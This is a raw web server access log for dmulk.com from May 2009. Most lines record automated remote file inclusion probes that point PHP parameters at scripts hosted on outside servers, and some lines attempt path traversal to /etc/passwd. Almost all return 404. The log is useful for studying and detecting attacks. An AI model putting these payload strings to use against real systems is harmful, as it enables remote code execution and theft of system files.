67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:11 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:12 -0700] "GET /logs/access_081118.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:12 -0700] "GET /config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:12 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:08:14 -0700] "GET /logs/access_080426.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:08:17 -0700] "GET /logs/access_081030.log%20%20//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:17 -0700] "GET /logs/access_090201.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:18 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:18 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:19 -0700] "GET /logs/access_090201.log//config/dbutil.bck.php?confdir=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:20 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:08:20 -0700] "GET /logs/access_080731.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:20 -0700] "GET /logs/access_090227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:20 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:08:20 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:22 -0700] "GET /logs/access_090106.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:08:23 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:08:24 -0700] "GET /logs/access_080426.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:08:24 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:08:24 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.86 - - [20/May/2009:09:08:25 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/021.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:25 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:25 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:28 -0700] "GET /logs/access_090106.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:08:29 -0700] "GET /logs/access_090227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:08:31 -0700] "GET /logs/access_080731.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:08:32 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:35 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:35 -0700] "GET /config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:35 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:54 -0700] "GET /logs/access_080421.log%20%20//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:08:59 -0700] "GET /logs/access_090201.log//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:09:12 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:09:16 -0700] "GET /logs/access_080118.log%20%20//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:09:16 -0700] "GET /logs/access_081030.log%20%20//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:09:29 -0700] "GET /logs/access_090119.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:09:30 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:09:45 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:09:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:09:47 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:09:47 -0700] "GET /logs/access_090227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:09:47 -0700] "GET /logs/access_090106.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:09:54 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:10:00 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:10:01 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:10:16 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:10:17 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.79.60 - - [20/May/2009:09:10:18 -0700] "GET /logs/access_081127.log HTTP/1.0" 200 2815235 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:10:22 -0700] "GET /logs/access_080330.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:09:10:22 -0700] "GET /modules/public/calendar.php?baseDir=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:10:25 -0700] "GET /logs/access_080829.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:10:27 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:10:28 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:10:30 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:10:31 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:10:32 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:10:36 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:10:40 -0700] "GET /logs/access_090122.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:10:51 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:10:52 -0700] "GET /logs/access_081112.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:10:56 -0700] "GET /guestbook1//admin.php?include_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:10:56 -0700] "GET /logs//guestbook1//admin.php?include_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:10:56 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.249.60.66 - - [20/May/2009:09:10:59 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://208.98.22.241/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:11:02 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:11:03 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:11:03 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:11:04 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:11:04 -0700] "GET /logs/access_081212.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:11:08 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:11:08 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:11:09 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:11:20 -0700] "GET /logs/access_090217.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:11:20 -0700] "GET /logs/access_090208.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:12:54 -0700] "GET /logs/access_090106.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:13:04 -0700] "GET /logs/access_081123.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:13:04 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:13:04 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:13:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:13:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:13:29 -0700] "GET /logs/access_080530.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:13:42 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:13:42 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:13:47 -0700] "GET /logs/access_081116.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [20/May/2009:09:14:28 -0700] "GET /logs/access_081201.log/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [20/May/2009:09:14:28 -0700] "GET /logs/access_090215.log/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:14:55 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:14:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:14:56 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:14:56 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:14:56 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:14:58 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:14:59 -0700] "GET /logs/access_090227.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:15:00 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:15:04 -0700] "GET /logs/access_090106.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:15:05 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:15:13 -0700] "GET /logs/access_080717.log%20%20//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:15:17 -0700] "GET /logs/access_080426.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:15:25 -0700] "GET /logs/access_080731.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:09:15:50 -0700] "GET /logs/access_080826.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:15:50 -0700] "GET /logs/access_090106.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:15:50 -0700] "GET /logs/access_090227.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:09:15:55 -0700] "GET /logs/access_080826.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:03 -0700] "GET /logs/access_080815.log/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:03 -0700] "GET /logs/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:03 -0700] "GET /logs/access_081212.log/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:05 -0700] "GET /logs/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:05 -0700] "GET /logs/access_080815.log%20%20/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:08 -0700] "GET /logs/access_081212.log%20%20/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:16:11 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:16:11 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:13 -0700] "GET /logs/access_080815.log/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:16:13 -0700] "GET /logs/index.php?option=com_user//index.php?option=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
